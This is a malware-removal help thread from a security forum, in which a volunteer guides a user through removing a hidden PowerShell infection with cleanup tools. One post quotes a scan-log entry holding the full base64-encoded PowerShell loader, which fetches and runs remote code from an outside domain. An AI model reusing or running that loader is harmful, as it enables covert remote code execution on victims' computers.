Powershell exe appearing on taskbar out of nowhere

[Zeelu]

I have been having this issue for a while now, powershell exe keeps appearing on my taskbar out of nowhere. Absolutely nothing changes on my screen but I just see it appear and disappear in a few seconds every now and then. I read up online and found scary things like ransomware and locked files and what not, so I decided to try out a bunch of online methods to get rid of it. Initially I had AVAST, but since that wasn't detecting anything I uninstalled it and got the free version of AVG, which detected the powershell exe file trying to connect to a website "camel support" but I couldn't do anything about it, as AVG would prompt every now and then that it stopped Powershell from connecting to the camel support website but I couldn't find anywhere on the internet how to get rid of it completely. I uninstalled AVG and downloaded Malwarebytes but that did nothing then I got Bit Defender on a one month full functioning trial, hoping it would find the problem and get rid of it, but Bit Defender is doing exactly what AVG does, it only blocks Powershell from connecting to Camel Support.

Is there anyway I could delete powershell or re-install or something?

I am not computer literate at all, I hope someone here can tell me whats going on and how I can get rid of it. Thank you so much.

[kevinf80]

Hello Zeelu and welcome to Malwarebytes, My screen name is kevinf80, i`m here to help clean up your system. Make sure to run all scans from accounts with Administrator status, continue as follows please: Anyone other than the original starter of this thread please DO NOT follow the instructions and advice posted as replies here, my help and advice is NOT related to your system and will probably cause more harm than good... Change the download folder setting in the Default Browser only. so all of the tools we may use are saved to the Desktop: Google Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser. Choose Settings. at the bottom of the screen click the "Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK. Mozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Choose Options. In the downloads section, click the Browse button, click on the Desktop folder and the click the "Select Folder" button. Click OK to get out of the Options menu. Internet Explorer - Click the Tools menu in the upper right-corner of the browser. Select View downloads. Select the Options link in the lower left of the window. Click Browse and select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen. NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop. Change default download folder location in Edge -Boot to a user account with admin status, select start > file explorer > right click on "Downloads" folder and select "Properties" In the new window select "Location" tab > clear the text field box and type in or copy/paste %userprofile%\Desktop > select "Apply" then "OK" Safari Select settings (looks like cog wheel, top r/h corner) from the list select "Preferences" in the new window with "General Tab" selected, expand dropdown from "save downloaded files to" box, then select "other" from the new window navigate to and select "Desktop" Be aware you are not changing the Browser download folder location, you are changing the user’s download directory location..... Next, Follow the instructions in the following link to show hidden files: http://www.howtogeek.com/howto/windows-vista/show-hidden-files-and-folders-in-windows-vista/ Next, Download and save RogueKiller to your Desktop from this link: https://www.fosshub.com/RogueKiller.html/setup.exe Right click setup.exe and select Run as Administrator to start installing RogueKiller. At the next window Checkmark "Install 32 and 64 bit versions, then select "Next" In the next window skip Licence I.D. and Licence Key, select "Next" In the next window make no changes and select "Next" In the next window leave both "Additional Shortcuts" checkmarked, then select "Next" In the next window make no changes and select "Install" RogueKiller will extract and complete installation, in the new window leave "Launch Roguekiller" checkmarked, then select finish. RogueKiller will launch. Accept UAC, then read and accept "User Agreements" In the new window the "Home" tab should already be selected, Change by selecting "Scan" tab, then select "Start Scan" When the scan completes select "Open Report" In the new Window select "Export text" name that file RK.txt, save to your Desktop and attach to your reply Let me see that log... Thank you, Kevin...

[Zeelu]

Hi Kevin! Thank you so much for your quick reply. I ran the scan, here is the report you asked for.

Results.txt

[kevinf80]

Thanks for the log, continue with the following:   Right click on RogueKiller.exe and select "Run as Administrator" to start the tool, accept UAC.. In the new window the "Home" tab should already be selected, Change by selecting "Scan" tab, then select "Start Scan" When the scan completes Checkmark (tick) the following against Tasks entries, ensure that all other entries are not Checkmarked [Mal.Powershell] \{0A7A7A47-050D-0A08-7D11-080578791104} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAOwAgACAAOwA7ACAAOwA7ADsAOwA7ADsAOwAgACAAOwAgADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAEcARgBDAEEASwBBACgAJABwACkAewAkAG4APQAiAFcAaQBuAGQAbwB3AFAAbwBzAGkAdABpAG8AbgAiADsAdAByAHkAewBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAfABPAHUAdAAtAE4AdQBsAGwAOwB9AGMAYQB0AGMAaAB7AH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0AIAB9ADsAfQBHAEYAQwBBAEsAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAF8AdgAxAC4AMABfAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiACkAOwBHAEYAQwBBAEsAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AEcARgBDAEEASwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AZgB2ADcAcwBwAHkAVgA3ADMAegBrAFMAbgAwAHoAWABwAHMAXwB3AE0AeABfAGUAMgBWAEgAQgB1ADIAZwBaADYANgBsADUAbQBCAGYASgB3ADAAMgB0AG8ASgBmAEgAegByAGMASQAzAEoAVABmAHEAbQBNAE0ASQAtAFUAVwAzAHYATgBQAEEAegAtAHcALQBEADIASwBSADYAOABiAGEAVgBYAHEAOABJAFAAbABQADUAWgA5AFUAdgB2ADMAUgB1AC0ANQBIAGQAQQBiADQAZQBlADMARgBnAFkAMwAwAEcATwBRAFkASQA5AFEAeABSADYAYwA4AHEAeQBuAFoAawBfAE8AMQBwAE4ASQBMADIAZgAzAHoATgB0AHUAQwBmAEgARAAtAG8AQgBRAFgAcABhAFIATwBHAHUAXwBsAGQAZgBvAGIAeABUAEQAYgBwAFUAeAA2AGEAawBNADQAVABKAHEAUQB2ADYAcQBGAGEARwB0AFoAeAB6AG0AMQBKAHIAMwBoAF8AWgB3AHIATQBmAC0AZABQAHYANwA5AF8AVQBlAEYAVQBzAHQAMwBnAHAAQQBBADcAOABvAGoAdABqAE8AUQBKADYAUwBVAFIAMQBhAG4ATgB4AEMAVwAtADcAOAAyAHkAbQBTAGEAagBEAF8AdgBTAHMAeQBOAHEAdQB0ADYAUABfAHgAbgBwAGcAXwA3AE4AMwBDAFMARgBtAF8AQQBsAEYAOQBfAGoAcAA4AFAAYQBVAGQAZwBzAEIALQBQAEkATgAzAC0AXwBVADUAQwBmAFAAYwA3AFkARQB2AGwAbQBKAEsAUgAtAEwAdwBXAFAAVwB2ADQAawBUAEgAZwB2ADgAVABnAF8ARwBTAG4AQQBzADMAWgBzADAAWgBiAEgAbwBTAE8ATwB3AG4AawBIAGwAWQBhAG4ARABnAFUARwBSAEMANwBJAEgAZwBCAHkARQBNAHAAXwBtAE0AeABGADMAdQB4AGMANQBDAHMAWgB6AG4AMQBuADMAWgBFADAAbwBNAFMASgB3AGoAVQAzAEUASgBXADEANgBtAFMAYwB0AFUAcABGAHkAWQB2ADIAVwBKAGkAYQBCAHMANgBCAHkAcQBXAFAASgByAEYATAB6AGMAegBHAHIAagBqAHEASwBlAG8AcQBFAGsATQBsAEYAbQBMAEsAaQBMAE0AZgB0AEIAUQBWAFAAYgBEAFEANwBMAEEASABrAEMAcQBBAFIAMgBBAFAAeABlAFYAUwBTAHQAbQA0ADQAWQBSAHUAQgBjADYAMQBUAF8AVgBvAF8AUwBaADQAVQBqAGcASQBBAEMATQA3ADgAeQBWAHoATgBhAFUANwBOAF8AYQBWAEcAUwBPADUATQBlAE0AbwBhAGcAVgBnAHgAVAA5AEgAQgBtAFQAMgBQAFMAWQBfAG8AQgAwAGQAMwA1AEEANQBsAC0AOABpAGUAdABYAEIAcQBUAGoASwBKAFUAegA4AGUAWABnADkARQBQAEwANwBDAGsANQBPAFQAagBiADcAbgA4AFQAbwB6AHcAMgB4AFoAaABxAG8AegBHAFoAegBiADEATQBXAEIAcQBFAGYAMgA4AGUAOQA2AEYAawBFAFYANQBQAFEASgBaAGIAZQBwAG4AbwBmAFEASwB3ADkAUQBnAFYAOQBQAGYAdABTADcAUABtAHQAcABSAHYAdABKAG8AYgBFAHMAbQAxAGYANAByAG0AZwBKAHEAUQBNAFYAcABrAGwAMQBEAHcASwBDAFoAWgBhAEIAeABxAEIAUwBjAHcASgBHAHgAUwBjAEMAYwBwAFAASwBoAFkATgBaADkANQB4AEoAOABTAFQAdwBRAEcAagAzAGkAZwB6AFgAVABsAFgAMwBSAGYAMQA2AFEARwBFAHgAagB6AHkAVgBVAGcAMwBGAF8AVwBrAE4ALQBpAGIAMQBwAGIATwBRAG4ARgB3AEUAOQA4AGMAWABpAEEARwBXAHIAegBxADEAWgBlAGkAZQBSAC0AagBsAHMAVwBMAEQAdgB6AGwAQQBxADMAUABfAGQAdgA2AFcAcQBSAGEAdgA5AFcAVABNADIAOQAzADEAYgBmAEkAVgA5AHUAWgA5ADIAWQBwAF8AaQBDAHcAOABiAEQANABBAEEAeAA3AEYARgBSAG4AcgBEAFgARABSAGwAMABRAFAANgBsAG0AMwBhAG4AOQA4AFcARQBSAGgAVwB3AF8AegA3AEsARABsAEsAVwBYAEYAOAAwAG4AawBzAHEAaABSAFkAeQBRAHEASwB2AEIAVgBvAHAAZABuAGQAdQBzAFcAYgBPAGYAbQBuAHUAdwB3AGEARQBhAEcAQQBuAGcATABuAEoASgA3ADUAZABFAG0ASgB6AGYASQB4AHIAUwBHAEgAMABPAEUAOQBPAEEAbAA3AHoAMQB6AHAATwBLAGEANgBKADMAZgBKAHUAbwBIADkAcQBCAFIAXwB2ADYAZwBaAHUAcwBfAGwAWAA4AE0AaQBJAHoAbwBwAGkAOQAtAGcAMQB0AGUAbwBrAHMAbgBOAEsAWAA5AHAAVwAtAHUAZwA4AE8ANQBRAFYAdwBLAHQAQQA0ADUAYgB6AE4AUABtAEYAWgBQAFIAWQBwAHMARwBkAFcAZgBxAHEASABpAHAAWgBPAFAASgBHAGwAaQAyAGcAeQBMAEwAVAAtAGUAVwBYAFIAVgBDAGoAVgBuAGIAawBQAHUASABnAF8AbwAmAGMAPQByAEEAMABNAEYAUABOAFAALQAtAGYAMgA1ADEAVABQAEcAeABUAE0AaQBGAFcASwBEAEMAbAB0AGoAYQB0AGoAMwB6AGwANQB4AGgATAAxAEYAdgBuAFIAcwBMAEQAdwA0ADkALQByADQAcABuAEQAUwAzAFgAVwBRAE4ATgBoAGsANgBnAGMAbABGADAAOABvAFMAZABpAHMAcQBvAC0ANQBMAFoAeQBwADYAbwBKAGYAegBoAHAARQBiAHQAMwBNAGIALQBRAE8AMgBUADgAZgBUADIAVABxAGsANQBiAE8AMAA3AHcATgBXAE0ATAB3ADMAWgBMAE0AZAB0AEQAdQBOAGsANAAzAHMARgB6ADEALQBSAG8AZABlAEYATgBvAF8AYQB4AGsAZwBVAFkAdQBMADYAdABUAGgAagBNADAATQBrAGgAQgBWADkAUwBsAFAAWAA3ADEAVgA5ADEASgA0AEMAOABLAGcAWQBSAHYAWgBXAFcAdQA0ADgATwBzAEIASgAyAGcAQgB5AFoAZgAyAEMAOQA3AEoAdABLADIAZABYAE4AQwB3AGIARABaAG0AUgBaAEkANgAzAF8AcQBEAGkASwB2ADIAZgBiADQAOABzAGUAOQBOAF8AWQBnAE4ARQBvAEkAcgA1AEkAWgBuAEoASABFAGMARwBfAHEAVgBEAGQATQBvAHAAVgA2ADUAZwBPAGIAdABrADMAQwBrAGIAbQBUAG4ATgA3AEsAcgBXAEEAVQBvAFkAeQBBAEQAWgA4AGwAegBTAFoAdgBpAHIAUABYAHcANwBVADEAcgBlAEwARgBzAC0ATQA1AGsAZQA2ADYAagBfAE0AQQBFAGcAVABNAHUAbABvAF8AZwA2AFIANABjAGwASQBTAG4AcwBRAFMATABJADUAaQBxAHMAawA3AEgAOABNAEEATwBKAEYALQB5ADgAMABLAFUAOQBBAGIASwBVAFEAaABUAEwAVABXAHEAbQB2AGcATgA4AEEAMwBNAE0AVwBNADMAXwBEAHoAUgA1AGkANABNAGsAbQBOAGoAUQBHAFoAUwBIAEIASQBXAEcANwBmAGEAMABFAEgAYgBGADgAdQBwAG4AbQBXAEwAMQBMAFAAdAA5ADcATwBkADQAUwBDAHgAWgBSAGQANABhAHgAbgA2AGkAawB1AHoAcABlAGQALQAtAG4AaAB1AGQAagBKAHMARgBWAFIAbQA1AGkAdgBUAGMAcgBIAGgAeQA0AHMASwA0AHkAZABiAGgAbwB5ADEAeQB1AFIALQBBAE8ALQBfAGgARgBDAEIAcgBYAG0AVAB4AHkAdQB0AFoAMQBFAGIAawBkADMAYQBIAGUAQgBDAFUAZgAzAHIAUgBJADUALQBWAEYAagAzAEoAQwBlAEQAbwB0AGsANgBPAFcAUAA1AE4AbABxAHEAbwBtAEsAYgAwAEYAVwBnAEgARAB2AGkAdAAzAFEAcwAwAE4ATwBrAG4AWQBmADQAWgAtAE8AUAA0AEwAcwBGAGIAUABTAFQAMwByAF8ANQByAHUAbwBMAEwAdwBRAGoAVwBtADAAMABCAEkAUABjADgAcwBXAE0ANwAyAG4ALQBLAGQAMgB5AGkATgBSAG4AVwBVAG0ANwBEAHIAWQBzADYANABpAE0AVQBWADUAaABOAFgAaQBiADAAaQBBADQAYwBMADgAaABsAHYARQBCAGIAUQBaADQAVQB5AGEAWABZADIAcwBDAHAAZABMADAAbQA2AEsAUwBVAEQATQBaAEQAZwA0ADgASgBQAE0AZQBTAF8ASQB4AGsAWAB6AGEATwAxAGMAQgBRAEQAUgB3ADgANgBFAEYARgAtAGMAdQB3AFYAYgBZAHcAQgBzAE4ASABiAGkAbwBuAEcAQgAwAFkANwBtAGUASgBKAHYAVwBDAGkAcQBsAHEAXwBwADEARQBWAE0AUQB1AFoATgBKAGkARABWAHMATgByAG8AbQA4AEgAZwBhAHIAMgBBAHQAZABoAFMANgB4AGwAMABMAGMATAA1AFAAZgBMAFoAUwBnAHgAcABJAEwANABNAFQAaQBFAGEAWAA2ADQAUQBoAEMAUQBuAEQAMgBOAF8AYQBxAEcANQA5AFgATwBlADYAZQBUAE4AZwA5AFoAYwA3ADUAMwA3AG0ATAByAHgAMwAzADIAQgBrAEIAbQBkAFgASABuADUAVgBSAEEAeAA0AHYASgB3ADgAMQA4AG0AXwBOAHcANABmAGUAZgBoAGIASwBuAEsATwBVAEUAUwAxAGgANABRAF8AcwBVAG4AVwBYAGQAYgB1ADgAWgBRAEsAZgBpAEkAawAxAFkAdgB1AEUAdwBNADMAYgBrAGsAYwBuAEsAZQBNAGUANABpAFMASQBSADIAOQB4AC0ARwBDAHQANwB2ADYAVQB4AG4AWQBhAGkAcQBSAFoASAAyAEcAbQAyAFIALQBLAFIAaABDAE4AWgB4AFQAYQBSAHEAZQB6AFYAQgB4AGIAQgBYAGIAcAAmAHIAPQA0ADYANQA3ADcAMwA0ADAAMgAwADYAMAAyADEAMAAzADIAMwAwACIAOwAkAHMAdABzAGsAPQAiAHsAMABBADcAQQA3AEEANAA3AC0AMAA1ADAARAAtADAAQQAwADgALQA3AEQAMQAxAC0AMAA4ADAANQA3ADgANwA5ADEAMQAwADQAfQAiADsAJABwAHIAaQBkAD0AIgBPAG4AZQBTAHkAcwB0AGUAbQBDAGEAcgBlACIAOwAkAGkAbgBpAGQAPQAiAE8AVgBYAFgATABaAE4AUgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAWgBQAFkAUwBHAF8AUABLAFIAVwBUAEMATABCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwAgAH0ACgBmAHUAbgBjAHQAaQBvAG4AIABYAEIARQBBAFcAQQBZAFgAWQBSAFoAUgBDACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7ACAAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAH0ACgAkAHMAYwA9AFgAQgBFAEEAVwBBAFkAWABZAFIAWgBSAEMAKABaAFAAWQBTAEcAXwBQAEsAUgBXAFQAQwBMAEIAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewA7AH0AOwBlAHgAaQB0ACAAMAA7AA==) -> Found [Suspicious.Path|Tr.Gen1] \{369197DD-813A-2076-A7F8-6DBDA91177B6} -- C:\ProgramData\{9E63FD10-29C8-4ABB-BA0A-3E4F875080C6}\E6AE4011-5105-F7BA-D7CC-DFD659B3D21A.exe (/run) -> Found Checkmark (tick) the following against File entries, ensure that all other entries are not Checkmarked [PUP.Gen0|PUP.Gen1][Folder] C:\ProgramData\Solvusoft -> Found [PUP.Gen1][File] C:\Users\ZeeLu\Desktop\Uninstaller.lnk [LNK@] C:\PROGRA~1\Uninstaller\Uninstaller.exe -> Found [PUP.Gen0][Folder] C:\Users\ZeeLu\AppData\Roaming\Browsers -> Found [PUP.Gen0|PUP.Gen1][Folder] C:\Users\ZeeLu\AppData\Roaming\Solvusoft -> Found [Tr.Gen0][File] C:\Users\ZeeLu\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe -> Found [Tr.Gen0][File] C:\Users\ZeeLu\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe -> Found [PUP.Gen1][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Uninstaller -> Found [PUP.Gen0|PUP.Gen1][Folder] C:\ProgramData\Solvusoft -> Found [PUP.Gen1][Folder] C:\Program Files\Uninstaller -> Found [PUP.Gen1][File] C:\Users\ZeeLu\Desktop\Uninstaller.lnk [LNK@] C:\PROGRA~1\Uninstaller\Uninstaller.exe -> Found [PUP.Firefox][File] C:\Users\ZeeLu\AppData\Roaming\Mozilla\Firefox\Profiles\3igug59n.default\Invalidprefs.js -> Found Checkmark (tick) the following against Web Browser entries, ensure that all other entries are not Checkmarked [PUP.Gen2][Firefox:Addon] 3igug59n.default : Ant Video Downloader [anttoolbar@ant.com] -> Found Hit the Delete button, when complete select "Open Report" in the next window select "Export txt" the log will open. Save to your Desktop for reference, also attach to next reply.   Next,   Download Farbar Recovery Scan Tool and save it to your desktop. Alternative download option: http://www.techspot.com/downloads/6731-farbar-recovery-scan-tool.html Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version. If your security alerts to FRST either, accept the alert or turn your security off to allow FRST to run. It is not malicious or infected in any way... Be aware FRST must be run from an account with Administrator status...   Double-click to run it. When the tool opens click Yes to disclaimer.(Windows 8/10 users will be prompted about Windows SmartScreen protection - click More information and Run.) Make sure Addition.txt is checkmarked under "Optional scans" Press Scan button to run the tool.... It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply. The tool will also make a log named (Addition.txt) Please attach that log to your reply. Let me see those logs in your reply... Thank you, Kevin...

Edited March 26, 2017 by kevinf80

[Zeelu]

Hi, here are all three of those logs. Thank you!

 

 

FRST.txt

Addition.txt

Results2.txt

[kevinf80]

Those logs are clean, how is your PC running, any remaining issues or concerns...?

[Zeelu]

I can't tell honestly, I'll only know if I never see the powershell.exe pop up again. But I trust your technical abilities! I'm sure its all good now  I just have one more question, is there anyway I could make a new restore point for my computer, since this is probably the cleanest my pc has been in months so I would like to restore it to this point if it ever gives me trouble again in the future. Thank you!

[kevinf80]

Even though your logs look clean i`d still like to run couple more scans, before that i`ll give you instructions for registry backup tool that I use....

Tweaking.com Registry Backup   Download Tweaking.com Registry Backup from here, and save tweaking.com_registry_backup_portable.zip to your desktop. Now we need to create a new folder to extract the zipped contents into. Right click on the zipped folder you just downloaded and select "Extract All". Click the "Browse" button and from the list, expand "Computer", then expand "Windows (C:)", and click the "Make New Folder" button. Call this folder something you will remember...like "RegBackup" then click "Ok", and then click "Extract". From the newly extracted files, right click on and select Run as Administrator (XP users just double click) to start Tweaking.com Registry Backup.(Windows Vista/7/8/10 users: Accept UAC warning if it is enabled.) A screen like this should appear:   Type a custom name in Backup Name if you want, then choose Backup Now. If backup is successful, a message will appear at the lower half of the screen with an option to view logs. The registry backup will be created in %WindowsDrive%\RegBackup by default. You can customize the path in Settings. Close Tweaking.com Registry Backup when done. Restore backup with Tweaking.com Registry Backup   Save your work and close all open windows before proceeding. Please reopen from its folder. When the main window appears, choose Restore Registry at the top. Click the white bar next to Select Backup to Restore and select the backup made earlier.   Place a checkmark in Restart/Shutdown System When Finished, and choose Restart System. Ensure that all files are checkmarked, then click Restore Now. When prompted to confirm, click Yes. Tweaking.com Registry Backup will reboot the computer when it finished restoring the registry. Next,

Go here: https://www.tenforums.com/tutorials/3012-open-use-disk-cleanup-windows-10-a.html Use "Option two" and run Disk clean up.... Next, Download Malwarebytes version 3 from the following link: https://www.malwarebytes.com/mwb-download/thankyou/ Double click on the installer and follow the prompts. If necessary select the Blue Help tab for video instructions.... When the install completes and is updated do the following: Open Malwarebytes, select > "settings" > "protection tab" Scroll down to "Scan Options" ensure Scan for Rootkits and Scan within Archives are both on.... Go back to "DashBoard" select the Blue "Scan Now" tab...... When the scan completes deal with any found entries... Then select "Export Summary" then "Text File (*.txt)" name that log and save , you can copy or attach that to your reply... Next, Download AdwCleaner by Xplode onto your Desktop.   Double click on Adwcleaner.exe to run the tool. Click on the Scan in the Actions box Please wait fot the scan to finish.. When "Waiting for action.Please uncheck elements you want to keep" shows in top line.. Click on the Cleaning box. Next click OK on the "Closing Programs" pop up box. Click OK on the Information box & again OK to allow the necessary reboot After restart the AdwCleaner(C*)-Notepad log will appear, please copy/paste it in your next reply. Where * is the number relative to list of scans completed... Next, Download Microsoft's " Malicious Software Removal Tool" and save direct to the desktop Ensure to get the correct version for your system.... 32 Bit version: https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en 64 Bit version: https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en Right click on the Tool, select “Run as Administrator” the tool will expand to the options Window In the "Scan Type" window, select Quick Scan Perform a scan and Click Finish when the scan is done. Retrieve the MSRT log as follows, and post it in your next reply: 1) Select the Windows key and R key together to open the "Run" function 2) Type or Copy/Paste the following command to the "Run Line" and Press Enter: notepad c:\windows\debug\mrt.log The log will include log details for each time MSRT has run, we only need the most recent log by date and time.... Let me see those logs in your reply... Thank you, Kevin...

 

 

[Zeelu]

Microsoft Windows Malicious Software Removal Tool v5.46, March 2017 (build 5.46.13601.0)
Started On Mon Mar 27 00:18:32 2017

Engine: 1.1.13504.0
Signatures: 1.237.571.0
Run Mode: Interactive Graphical Mode
Successfully Submitted Heartbeat Report
Microsoft Windows Malicious Software Removal Tool Finished On Mon Mar 27 00:18:59 2017

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.46, March 2017 (build 5.46.13601.0)
Started On Mon Mar 27 00:19:13 2017

Engine: 1.1.13504.0
Signatures: 1.237.571.0
Run Mode: Interactive Graphical Mode

Results Summary:
----------------
